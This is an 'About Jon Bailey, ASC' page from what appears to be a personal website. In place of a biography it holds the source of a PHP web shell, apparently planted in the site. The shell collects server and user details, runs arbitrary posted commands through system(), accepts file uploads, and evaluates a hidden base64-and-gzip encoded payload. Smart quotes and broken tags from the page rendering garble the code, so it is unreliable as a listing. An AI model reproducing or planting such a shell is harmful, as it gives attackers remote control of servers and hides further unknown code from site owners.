About Jon Bailey, ASC





< ?php
closelog( );
$user = get_current_user( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$ver = phpversion( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
if(!$whoami)$whoami=exec("whoami");
?>

< ?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>

< ?php
}
?>


< ?= $info ?>
:
< ?= $value ?>

User Info:
uid=< ?= $login ?>(< ?= $whoami?>) euid=< ?= $euid ?>(< ?= $whoami?>) gid=< ?= $gid ?>(< ?= $whoami?>)

Current Path:
< ?= $chdir ?>

Permission Directory:
< ? if(@is_writable($chdir)){ echo "Yes"; }else{ echo "No"; } ?>

Server Services:
< ?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>

Server Address:
< ?= "$SERVER_ADDR $SERVER_NAME"; ?>

Script Current User:
< ?= $user ?>

PHP Version:
< ?= $ver ?>

< ?php

set_magic_quotes_runtime(0);

$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);

$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;
$Ls = `ls -al`;
$jumper="3VRRb5swEP4rFwvNRqVAtkmTEiCTpk7aHjppe5rSiBlsilfAyDZrs2r/fefQpM3LfsCEMObuu++7Ox/IutVAMserTkLdcWvzG1L3otIPN6TInMFbQK07O/IBXa/RStbAAttDDmpQ5a10jFreyLLXQtIQ8hzSEDYwQ6huGroCoSQjV8Zos4JvRzC6vwxZ4kSBi/GLT6PIhPp1ykUNjUbNbVlWb969vYN+OSwh89mcILd8z32yHFojm5xuaEHi4OGa9zImWcKR2OMLuBLKKX1dlrssQY0CzpR+zjTwGZ8db+HTIPQgreJ3E7yq9bhfA4kFd5LR7zRyqpcsDGMCz1qwvgxhpibhGqx0pYeVneqVYyma3gcjit0LrLzRoxwYTaSrk9lII2ooglQDbPEEDOHR9w4Y2V7u4NBAWMEHPYnhh4Ovkgt4wfD/9vIPBONUYdu4MXzP0BJMVhp7Zqn10JwZFL6la7hvVSfZopG6Yce+ho84oM74g8AJtif73H6MLGCZph41aq+CWNwwHxPRFT0mMGCy3jtV6Ji9aeRDPEAo89t/Akmre5nQ+BQR0wSr6VRdtq7vEjqLsmfGBUZRn6O3K1saPGh/nuzA6R2HIstxsu0cZqNTNEq/9KJSNIf5NvorUBcXft9o5K1beGIAbueikF76/wLdftTTIGCxg+NAkM0+PyvnvBRS/MOZHOanMgX14pviLw==";
if( $currentWD == "" ) {
$currentWD = $SCWD;
}

if( $_POST['_act'] == "List files!" ) {
$currentCMD = "ls -la";
}

print "



“;
print “

“;
print “

“;
print “

“;

print “

“;
print “

“;

print “

“;
print “

“;

print “

Execute CMD:
Change Dir:
Upload File:


“;

$currentCMD = str_replace(“\\\””,”\””,$currentCMD);
$currentCMD = str_replace(“\\\’”,”\’”,$currentCMD);

if( $_POST['_act'] == “Upload!” ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print “

Error while uploading file!
“;
} else {
print “
";
        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
        print "

File uploaded successfully!

“;
}
} else {
print “\n\n\n
\n";
    $currentCMD = "cd ".$currentWD.";".$currentCMD;
  system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm 
/tmp/cmdtemp");
}
if($_POST['_act']=="FIND RW"){@eval(gzinflate(base64_decode($jumper)));
}
    print "\n

\n\n\n



Command completed
“;

exit;

?>

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>